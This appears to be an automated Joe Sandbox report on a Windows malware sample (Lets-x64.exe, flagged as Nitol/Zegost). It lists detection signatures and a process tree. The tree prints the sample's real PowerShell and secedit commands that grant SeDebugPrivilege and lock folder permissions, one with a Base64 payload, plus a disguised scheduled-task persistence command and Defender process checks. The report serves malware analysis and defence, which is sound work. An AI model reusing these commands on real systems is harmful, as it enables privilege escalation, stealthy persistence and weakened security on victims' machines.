Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lets-x64.exe

Overview

General Information

Sample name:Lets-x64.exe
Analysis ID:1582022
MD5:a702cc254b31fbc4a5ec45fa16573521
SHA1:85c6aff84ebee14d9df214f1760a6bd4975e49ec
SHA256:887cf0ade18f096b4828e224f7f8a9fd2297c9fff930134e676af8b4d99455b9
Tags:exeuser-aachum
Infos:

Detection

Nitol, Zegost
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
Yara detected Zegost
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to modify Windows User Account Control (UAC) settings
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Encrypted powershell cmdline option found
Found stalling execution ending in API Sleep call
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Lets-x64.exe (PID: 4500 cmdline: "C:\Users\user\Desktop\Lets-x64.exe" MD5: A702CC254B31FBC4A5EC45FA16573521)
    • irsetup.exe (PID: 320 cmdline: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B)
      • powershell.exe (PID: 5620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;} MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2952 cmdline: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • _P18sPbB.exe (PID: 6104 cmdline: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" MD5: 3BAED7BF765E1631DAF431D29173213C)
          • powershell.exe (PID: 1088 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7396 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • powershell.exe (PID: 984 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7420 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • powershell.exe (PID: 5996 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7328 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • powershell.exe (PID: 2436 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7412 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • cmd.exe (PID: 7224 cmdline: cmd /c echo.>c:\inst.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7600 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7680 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
      • powershell.exe (PID: 7632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 8028 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 6540 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • iusb3mon.exe (PID: 7272 cmdline: C:\ProgramData\program\iusb3mon.exe MD5: 3BAED7BF765E1631DAF431D29173213C)
    • powershell.exe (PID: 7936 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SecEdit.exe (PID: 7676 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
    • powershell.exe (PID: 7944 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SecEdit.exe (PID: 7648 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
    • powershell.exe (PID: 7960 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
